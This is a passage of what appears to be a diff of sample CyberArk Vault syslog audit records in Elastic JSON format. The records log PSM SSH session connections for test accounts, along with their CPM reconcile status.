Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} -<5>1 2021-03-16T10:04:51Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 16 03:04:51\n 2021-03-16T10:04:51Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 16 03:04:51","IsoTimestamp":"2021-03-16T10:04:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615888216"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-11T17:38:20Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:20\n 2021-03-11T17:38:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:20","IsoTimestamp":"2021-03-11T17:38:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:46:56Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:46:56\n 2021-03-11T17:46:56Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:46:56","IsoTimestamp":"2021-03-11T17:46:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:48:34Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:34\n 2021-03-11T17:48:34Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:34","IsoTimestamp":"2021-03-11T17:48:34Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:54:56Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:54:56\n 2021-03-11T17:54:56Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:54:56","IsoTimestamp":"2021-03-11T17:54:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:56:37Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:56:37\n 2021-03-11T17:56:37Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:56:37","IsoTimestamp":"2021-03-11T17:56:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T20:23:25Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:23:25\n 2021-03-11T20:23:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:23:25","IsoTimestamp":"2021-03-11T20:23:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-14T13:49:37Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:37\n 2021-03-14T13:49:37Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:37","IsoTimestamp":"2021-03-14T13:49:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-14T13:50:43Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:50:43\n 2021-03-14T13:50:43Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.13;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:50:43","IsoTimestamp":"2021-03-14T13:50:43Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.13;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:31:56Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:31:56\n 2021-03-15T10:31:56Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:31:56","IsoTimestamp":"2021-03-15T10:31:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:33:39Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:33:39\n 2021-03-15T10:33:39Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:33:39","IsoTimestamp":"2021-03-15T10:33:39Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:35:00Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:35:00\n 2021-03-15T10:35:00Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:35:00","IsoTimestamp":"2021-03-15T10:35:00Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T13:18:31Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:18:31\n 2021-03-15T13:18:31Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.13;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:18:31","IsoTimestamp":"2021-03-15T13:18:31Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.13;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T14:08:06Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:06\n 2021-03-15T14:08:06Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.13;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:06","IsoTimestamp":"2021-03-15T14:08:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.13;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T14:08:28Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:28\n 2021-03-15T14:08:28Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.13;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:28","IsoTimestamp":"2021-03-15T14:08:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.13;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-15T14:11:09Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:11:09\n 2021-03-15T14:11:09Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 